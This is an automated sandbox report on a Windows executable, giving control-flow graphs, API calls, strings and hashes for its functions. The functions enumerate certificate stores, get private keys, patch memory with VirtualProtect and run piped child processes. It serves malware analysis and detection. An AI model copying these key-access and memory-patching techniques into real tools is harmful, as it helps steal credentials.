7ff7cb871990 4 API calls 4941->4942 4943 7ff7cb87c396 4942->4943 4958 7ff7cb87c544 4943->4958 5042 7ff7cb87e940 4958->5042 5063 7ff7cb8725dc GetProcessHeap HeapAlloc 5042->5063 5151 7ff7cb8761f8 5152 7ff7cb87620e 5151->5152 5153 7ff7cb877234 5 API calls 5152->5153 5154 7ff7cb87623c 5153->5154 5155 7ff7cb877234 5 API calls 5154->5155 5156 7ff7cb87625c 5155->5156 5172 7ff7cb87ec04 5173 7ff7cb87ec1b 5172->5173 5175 7ff7cb87ec2f 5172->5175 5178 7ff7cb8725dc GetProcessHeap HeapAlloc 5173->5178 4413 7ff7cb8731c4 4414 7ff7cb8731d7 4413->4414 4415 7ff7cb871990 4 API calls 4414->4415 4416 7ff7cb8731e2 4415->4416 4417 7ff7cb871990 4 API calls 4416->4417 4418 7ff7cb8731f1 CertEnumSystemStoreLocation 4417->4418 4419 7ff7cb871990 4 API calls 4418->4419 4420 7ff7cb873215 4419->4420 5179 7ff7cb87e600 lstrcpyW PathAppendW 5180 7ff7cb87e640 5179->5180 5181 7ff7cb87ccf4 6 API calls 5180->5181 5183 7ff7cb87e65c 5181->5183 5182 7ff7cb87e6c7 5183->5182 5184 7ff7cb871990 4 API calls 5183->5184 5185 7ff7cb87e678 5184->5185 5186 7ff7cb8719e4 4 API calls 5185->5186 5187 7ff7cb87e683 5186->5187 5188 7ff7cb871990 4 API calls 5187->5188 5189 7ff7cb87e69b 5188->5189 5190 7ff7cb8719e4 4 API calls 5189->5190 5191 7ff7cb87e6ab 5190->5191 5192 7ff7cb871990 4 API calls 5191->5192 5193 7ff7cb87e6ba 5192->5193 5194 7ff7cb8725b4 2 API calls 5193->5194 5194->5182

                                                                        Executed Functions

                                                                        Function 00007FF7CB879224 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 158synchronizationtimeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 129 7ff7cb879224-7ff7cb879306 GetSystemTimeAsFileTime call 7ff7cb879a20 * 3 call 7ff7cb879a98 call 7ff7cb872698 call 7ff7cb8725dc call 7ff7cb877b34 * 4 call 7ff7cb87971c call 7ff7cb8725b4 154 7ff7cb879309-7ff7cb879317 129->154 155 7ff7cb879329-7ff7cb879330 154->155 156 7ff7cb879319-7ff7cb87931c call 7ff7cb87968c 154->156 158 7ff7cb87938c-7ff7cb879393 155->158 159 7ff7cb879332-7ff7cb879335 155->159 162 7ff7cb879321-7ff7cb879323 156->162 160 7ff7cb879395-7ff7cb879399 call 7ff7cb87968c 158->160 161 7ff7cb8793a2-7ff7cb8793b6 WaitForSingleObject 158->161 159->158 163 7ff7cb879337-7ff7cb879351 159->163 170 7ff7cb87939e-7ff7cb8793a0 160->170 165 7ff7cb8793b8-7ff7cb8793ca GetSystemTimeAsFileTime 161->165 166 7ff7cb8793f5 161->166 162->155 162->166 167 7ff7cb879353-7ff7cb879365 call 7ff7cb877b50 163->167 168 7ff7cb879382-7ff7cb879386 163->168 165->154 171 7ff7cb8793d0-7ff7cb8793e3 call 7ff7cb879a98 165->171 172 7ff7cb8793f7-7ff7cb879417 166->172 178 7ff7cb879367-7ff7cb87936e 167->178 179 7ff7cb879374-7ff7cb879380 167->179 168->158 169 7ff7cb879418-7ff7cb87942c WaitForSingleObject 168->169 169->166 176 7ff7cb87942e-7ff7cb879434 169->176 170->161 170->166 171->154 184 7ff7cb8793e9-7ff7cb8793ef TerminateProcess 171->184 180 7ff7cb879436-7ff7cb879439 call 7ff7cb87968c 176->180 181 7ff7cb879442-7ff7cb879449 176->181 178->169 178->179 179->167 179->168 186 7ff7cb87943e-7ff7cb879440 180->186 182 7ff7cb87944b-7ff7cb87944f call 7ff7cb87968c 181->182 183 7ff7cb879458-7ff7cb879468 GetExitCodeProcess 181->183 190 7ff7cb879454-7ff7cb879456 182->190 188 7ff7cb87946a-7ff7cb879471 183->188 189 7ff7cb879473-7ff7cb879475 183->189 184->166 186->166 186->181 188->166 188->189 189->172 190->166 190->183
                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CB87924D
                                                                          • Part of subcall function 00007FF7CB8725DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7CB871985,?,?,?,00007FF7CB87155F), ref: 00007FF7CB8725E5
                                                                          • Part of subcall function 00007FF7CB8725B4: GetProcessHeap.KERNEL32 ref: 00007FF7CB8725C1
                                                                          • Part of subcall function 00007FF7CB8725B4: HeapFree.KERNEL32 ref: 00007FF7CB8725CF
                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CB8793AB
                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CB8793C0
                                                                        • TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CB8793EF
                                                                          • Part of subcall function 00007FF7CB87968C: PeekNamedPipe.KERNELBASE ref: 00007FF7CB8796B8
                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CB879421
                                                                        • GetExitCodeProcess.KERNELBASE ref: 00007FF7CB879460
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessTime$Heap$FileObjectSingleSystemWait$CodeExitFreeNamedPeekPipeTerminate
                                                                        • String ID: & echo
                                                                        • API String ID: 2711250446-3491486023
                                                                        • Opcode ID: f92ee800b1b5a381f7537eb51654d869d3388ac1e002b9d5a8edb654dcec901f
                                                                        • Instruction ID: f1f3b4602660c41a43eb6dcc457bac1af7866b2f85ac833e43a63e4e2c84ad03
                                                                        • Opcode Fuzzy Hash: f92ee800b1b5a381f7537eb51654d869d3388ac1e002b9d5a8edb654dcec901f
                                                                        • Instruction Fuzzy Hash: B2517425A0965292EE20FF19E4446BAE3D1FF84BA4F841031FA4E576A5DF3CE495C3A0
                                                                        Function 00007FF7CB877138 Relevance: 4.5, APIs: 3, Instructions: 38comCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize$CreateInstanceSecurity
                                                                        • String ID:
                                                                        • API String ID: 89549506-0
                                                                        • Opcode ID: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                        • Instruction ID: 96836389c7bdf5ae4d86b112430b2b89b417f8ce70d1a51683ec38c9a86ad2f9
                                                                        • Opcode Fuzzy Hash: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                        • Instruction Fuzzy Hash: 7A118873A28640CBF3109F61E8593AE7774F34870DFA08218EA492A998CF3DD255CB94
                                                                        Function 00007FF7CB879AC8 Relevance: 4.4, Strings: 3, Instructions: 665COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 371 7ff7cb879ac8-7ff7cb879b39 call 7ff7cb878800 call 7ff7cb871990 call 7ff7cb879644 call 7ff7cb8726b0 380 7ff7cb879b3f-7ff7cb879b51 371->380 380->380 381 7ff7cb879b53-7ff7cb879b64 call 7ff7cb87900c 380->381 384 7ff7cb879b6a-7ff7cb879b7c call 7ff7cb8795a0 381->384 385 7ff7cb87a4e0-7ff7cb87a518 call 7ff7cb879624 call 7ff7cb871990 381->385 384->385 391 7ff7cb879b82-7ff7cb879b9c call 7ff7cb878258 call 7ff7cb8797dc 384->391 391->385 397 7ff7cb879ba2-7ff7cb879bce call 7ff7cb871990 call 7ff7cb878938 call 7ff7cb8797dc 391->397 397->385 404 7ff7cb879bd4-7ff7cb879bf9 call 7ff7cb871990 call 7ff7cb877fd4 call 7ff7cb8797dc 397->404 404->385 411 7ff7cb879bff-7ff7cb879c24 call 7ff7cb871990 call 7ff7cb878bc0 call 7ff7cb8797dc 404->411 411->385 418 7ff7cb879c2a-7ff7cb879c4f call 7ff7cb871990 call 7ff7cb877f4c call 7ff7cb8797dc 411->418 418->385 425 7ff7cb879c55-7ff7cb879c7a call 7ff7cb871990 call 7ff7cb87839c call 7ff7cb8797dc 418->425 425->385 432 7ff7cb879c80-7ff7cb879ca5 call 7ff7cb871990 call 7ff7cb878d80 call 7ff7cb8797dc 425->432 432->385 439 7ff7cb879cab-7ff7cb879cd0 call 7ff7cb871990 call 7ff7cb878e14 call 7ff7cb8797dc 432->439 439->385 446 7ff7cb879cd6-7ff7cb879cfb call 7ff7cb871990 call 7ff7cb878a88 call 7ff7cb8797dc 439->446 446->385 453 7ff7cb879d01-7ff7cb879d26 call 7ff7cb871990 call 7ff7cb8789d8 call 7ff7cb8797dc 446->453 453->385 460 7ff7cb879d2c-7ff7cb879d51 call 7ff7cb871990 call 7ff7cb878510 call 7ff7cb8797dc 453->460 460->385 467 7ff7cb879d57-7ff7cb879d7c call 7ff7cb871990 call 7ff7cb8781c4 call 7ff7cb8797dc 460->467 467->385 474 7ff7cb879d82-7ff7cb879da7 call 7ff7cb871990 call 7ff7cb878114 call 7ff7cb8797dc 467->474 474->385 481 7ff7cb879dad-7ff7cb879dd2 call 7ff7cb871990 call 7ff7cb8785c0 call 7ff7cb8797dc 474->481 481->385 488 7ff7cb879dd8-7ff7cb879e1f call 7ff7cb871990 call 7ff7cb8726b0 481->488 493 7ff7cb879e22-7ff7cb879e32 488->493 493->493 494 7ff7cb879e34-7ff7cb879e45 call 7ff7cb8797dc 493->494 494->385 497 7ff7cb879e4b-7ff7cb879e8e call 7ff7cb871990 call 7ff7cb8726b0 494->497 502 7ff7cb879e91-7ff7cb879ea1 497->502 502->502 503 7ff7cb879ea3-7ff7cb879eb4 call 7ff7cb8797dc 502->503 503->385 506 7ff7cb879eba-7ff7cb879f0a call 7ff7cb871990 call 7ff7cb8726b0 503->506 511 7ff7cb879f0d-7ff7cb879f1d 506->511 511->511 512 7ff7cb879f1f-7ff7cb879f30 call 7ff7cb8797dc 511->512 512->385 515 7ff7cb879f36-7ff7cb879f79 call 7ff7cb871990 call 7ff7cb8726b0 512->515 520 7ff7cb879f7c-7ff7cb879f8c 515->520 520->520 521 7ff7cb879f8e-7ff7cb879f9f call 7ff7cb8797dc 520->521 521->385 524 7ff7cb879fa5-7ff7cb879fe2 call 7ff7cb871990 call 7ff7cb8726b0 521->524 529 7ff7cb879fe5-7ff7cb879ff5 524->529 529->529 530 7ff7cb879ff7-7ff7cb87a001 call 7ff7cb8797dc 529->530 532 7ff7cb87a006-7ff7cb87a008 530->532 532->385 533 7ff7cb87a00e-7ff7cb87a054 call 7ff7cb871990 call 7ff7cb8726b0 532->533 538 7ff7cb87a057-7ff7cb87a067 533->538 538->538 539 7ff7cb87a069-7ff7cb87a07a call 7ff7cb8797dc 538->539 539->385 542 7ff7cb87a080-7ff7cb87a0c0 call 7ff7cb871990 call 7ff7cb8726b0 539->542 547 7ff7cb87a0c3-7ff7cb87a0d3 542->547 547->547 548 7ff7cb87a0d5-7ff7cb87a0e6 call 7ff7cb8797dc 547->548 548->385 551 7ff7cb87a0ec-7ff7cb87a12d call 7ff7cb871990 call 7ff7cb8726b0 548->551 556 7ff7cb87a130-7ff7cb87a140 551->556 556->556 557 7ff7cb87a142-7ff7cb87a153 call 7ff7cb8797dc 556->557 557->385 560 7ff7cb87a159-7ff7cb87a197 call 7ff7cb871990 call 7ff7cb8726b0 557->560 565 7ff7cb87a19d-7ff7cb87a1ac 560->565 565->565 566 7ff7cb87a1ae-7ff7cb87a1bf call 7ff7cb8797dc 565->566 566->385 569 7ff7cb87a1c5-7ff7cb87a202 call 7ff7cb871990 call 7ff7cb8726b0 566->569 574 7ff7cb87a205-7ff7cb87a214 569->574 574->574 575 7ff7cb87a216-7ff7cb87a227 call 7ff7cb8797dc 574->575 575->385 578 7ff7cb87a22d-7ff7cb87a266 call 7ff7cb871990 call 7ff7cb8726b0 575->578 583 7ff7cb87a269-7ff7cb87a278 578->583 583->583 584 7ff7cb87a27a-7ff7cb87a28b call 7ff7cb8797dc 583->584 584->385 587 7ff7cb87a291-7ff7cb87a2c3 call 7ff7cb871990 call 7ff7cb8726b0 584->587 592 7ff7cb87a2c6-7ff7cb87a2d5 587->592 592->592 593 7ff7cb87a2d7-7ff7cb87a2e8 call 7ff7cb8797dc 592->593 593->385 596 7ff7cb87a2ee-7ff7cb87a324 call 7ff7cb871990 call 7ff7cb8726b0 593->596 601 7ff7cb87a327-7ff7cb87a336 596->601 601->601 602 7ff7cb87a338-7ff7cb87a349 call 7ff7cb8797dc 601->602 602->385 605 7ff7cb87a34f-7ff7cb87a37d call 7ff7cb871990 call 7ff7cb8726b0 602->605 610 7ff7cb87a380-7ff7cb87a38f 605->610 610->610 611 7ff7cb87a391-7ff7cb87a3a2 call 7ff7cb8797dc 610->611 611->385 614 7ff7cb87a3a8-7ff7cb87a3f6 call 7ff7cb871990 call 7ff7cb8726b0 611->614 619 7ff7cb87a3f9-7ff7cb87a408 614->619 619->619 620 7ff7cb87a40a-7ff7cb87a41b call 7ff7cb8797dc 619->620 620->385 623 7ff7cb87a421-7ff7cb87a457 call 7ff7cb871990 call 7ff7cb8726b0 620->623 628 7ff7cb87a45a-7ff7cb87a46a 623->628 628->628 629 7ff7cb87a46c-7ff7cb87a47d call 7ff7cb8797dc 628->629 629->385 632 7ff7cb87a47f-7ff7cb87a4b0 call 7ff7cb871990 call 7ff7cb8726b0 629->632 637 7ff7cb87a4b3-7ff7cb87a4c2 632->637 637->637 638 7ff7cb87a4c4-7ff7cb87a4d5 call 7ff7cb8797dc 637->638 638->385 641 7ff7cb87a4d7-7ff7cb87a4db call 7ff7cb879478 638->641 641->385
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #qGq$$q*q$<9#$
                                                                        • API String ID: 0-163940422
                                                                        • Opcode ID: 52f61a20b0194fcb18550ca330a575ad691ed636dab6f24800a5f7c021c40964
                                                                        • Instruction ID: c20b7466cde168e6e8a613a8097b55299a4db59e08bc1e81f34c58533671ac1b
                                                                        • Opcode Fuzzy Hash: 52f61a20b0194fcb18550ca330a575ad691ed636dab6f24800a5f7c021c40964
                                                                        • Instruction Fuzzy Hash: 8A4280A1B482A14AEB00FFA984052FDA7E29B457DCB941035FE4D3BB5ADF3C9155C3A0
                                                                        Function 00007FF7CB872654 Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(?,?,?,00007FF7CB871951,?,?,00000000,00007FF7CB8719BA), ref: 00007FF7CB872669
                                                                        • RtlReAllocateHeap.NTDLL(?,?,?,00007FF7CB871951,?,?,00000000,00007FF7CB8719BA), ref: 00007FF7CB87267A
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocateProcess
                                                                        • String ID:
                                                                        • API String ID: 1357844191-0
                                                                        • Opcode ID: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
                                                                        • Instruction ID: 4bb0bebbb0910e14ce13e639b7da914db1b82d98f56d16e52a13795bcc2ef2e9
                                                                        • Opcode Fuzzy Hash: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
                                                                        • Instruction Fuzzy Hash: CBE08615B0859282E948FF9AB990075A1A1AF49FE4F889130FD0E17765DE2CD4A14790
                                                                        Function 00007FF7CB872D5C Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 253encryptiontimeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF7CB872D90
                                                                        • CertGetNameStringW.CRYPT32 ref: 00007FF7CB872DD3
                                                                        • CertNameToStrW.CRYPT32 ref: 00007FF7CB872EB8
                                                                        • CertNameToStrW.CRYPT32 ref: 00007FF7CB872F0A
                                                                        • FileTimeToSystemTime.KERNEL32 ref: 00007FF7CB872F4B
                                                                        • FileTimeToSystemTime.KERNEL32 ref: 00007FF7CB872FC1
                                                                          • Part of subcall function 00007FF7CB871A70: wvsprintfW.USER32 ref: 00007FF7CB871AA9
                                                                          • Part of subcall function 00007FF7CB8725B4: GetProcessHeap.KERNEL32 ref: 00007FF7CB8725C1
                                                                          • Part of subcall function 00007FF7CB8725B4: HeapFree.KERNEL32 ref: 00007FF7CB8725CF
                                                                        • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF7CB873178
                                                                          • Part of subcall function 00007FF7CB873220: CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB87325E
                                                                          • Part of subcall function 00007FF7CB873220: CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF7CB87328D
                                                                          • Part of subcall function 00007FF7CB873220: CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB8732BB
                                                                          • Part of subcall function 00007FF7CB873220: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873336
                                                                          • Part of subcall function 00007FF7CB873220: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873380
                                                                          • Part of subcall function 00007FF7CB873220: VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB8733AC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Cert$Time$Name$CertificateCertificatesCryptEnumFileHeapStoreSystem$AcquireAddressContextFreeLibraryLoadPrivateProcProcessPropertyProtectStringUserVirtualwvsprintf
                                                                        • String ID: 1.2.840.113549
                                                                        • API String ID: 2787208766-3888290641
                                                                        • Opcode ID: 8b73c42670ea8246c3f00f00a15c13dc80e28ec0ccd241d0236bafc5b6063659
                                                                        • Instruction ID: 8968d99f913e4fdfe2ada4c91b7664842ea367aeb879ab0ae441f578c23445af
                                                                        • Opcode Fuzzy Hash: 8b73c42670ea8246c3f00f00a15c13dc80e28ec0ccd241d0236bafc5b6063659
                                                                        • Instruction Fuzzy Hash: 07B18262A0865285EB50FF5AD4412BEE7A1FB85BD8F800031FA8D17B69DF3CD155CB90
                                                                        Function 00007FF7CB87900C Relevance: 13.6, APIs: 9, Instructions: 137pipeprocessCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: CreateErrorLast$Pipe$CloseHandleProcess
                                                                        • String ID:
                                                                        • API String ID: 2620922840-0
                                                                        • Opcode ID: e7471855f41c6a413a1e0a14d76814eaea720c7982075b5bda5c61cbaa643e0a
                                                                        • Instruction ID: 0e11febab4314407afc030a4c56ceab004938f65c608a28e342dc09d0a9687ba
                                                                        • Opcode Fuzzy Hash: e7471855f41c6a413a1e0a14d76814eaea720c7982075b5bda5c61cbaa643e0a
                                                                        • Instruction Fuzzy Hash: 1C514F32B18A1296EB50FF69D4847EC63E1AB587ACF810035FE0D6AA65DF3CD159C390
                                                                        Function 00007FF7CB872BAC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65encryptionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Cert$NameStore$CertificatesCloseEnumOpenString
                                                                        • String ID: )qnq$dqyq$yqyq
                                                                        • API String ID: 3617724111-466822987
                                                                        • Opcode ID: 9ae85fb58035b556ed7740a638f834076978180fa08e68d9f74bd72b5be20427
                                                                        • Instruction ID: a104a24208e40ed4624f4d7eede31f379a4f78b9d9ec1c3a864355805ecf6643
                                                                        • Opcode Fuzzy Hash: 9ae85fb58035b556ed7740a638f834076978180fa08e68d9f74bd72b5be20427
                                                                        • Instruction Fuzzy Hash: 4821C772A1869282EB50FF1AE8403AAF3A1FBC4794F845031FA8D57769DF3CD4558B90
                                                                        Function 00007FF7CB872B1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34encryptionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: CertEnumStoreSystem
                                                                        • String ID: ":{$"_":""
                                                                        • API String ID: 4132996702-2026347918
                                                                        • Opcode ID: bde7b9d95764b4a748e3e44d944acbe1370a7a94fc7036fd8cfb648fe9c63810
                                                                        • Instruction ID: 3c15beb3f8f56db79b6c0d9383330d9d5e11f77da701c96c77b1b28a4b3ebbba
                                                                        • Opcode Fuzzy Hash: bde7b9d95764b4a748e3e44d944acbe1370a7a94fc7036fd8cfb648fe9c63810
                                                                        • Instruction Fuzzy Hash: 8301A711E4866142FA44FF1AA4002B993D5AF98BE4FC85031FD1D17B7A8F2CD1A38390
                                                                        Function 00007FF7CB8731C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22encryptionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: CertEnumLocationStoreSystem
                                                                        • String ID: "_": ""
                                                                        • API String ID: 863500693-1453221996
                                                                        • Opcode ID: 6b21618263e360399a06e9a6e29e51c669755cc20520e873ad7292844cdbbc9a
                                                                        • Instruction ID: 1131989edacf9d4f681483825ceba0e28997f4b6ec6d0441fc173a5e4121752a
                                                                        • Opcode Fuzzy Hash: 6b21618263e360399a06e9a6e29e51c669755cc20520e873ad7292844cdbbc9a
                                                                        • Instruction Fuzzy Hash: 8AE06541B9851341EE84BF6AA8112F493955F997E4FC82031F81E16376DF2CD0E683A0
                                                                        Function 00007FF7CB87968C Relevance: 3.0, APIs: 2, Instructions: 42filepipeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
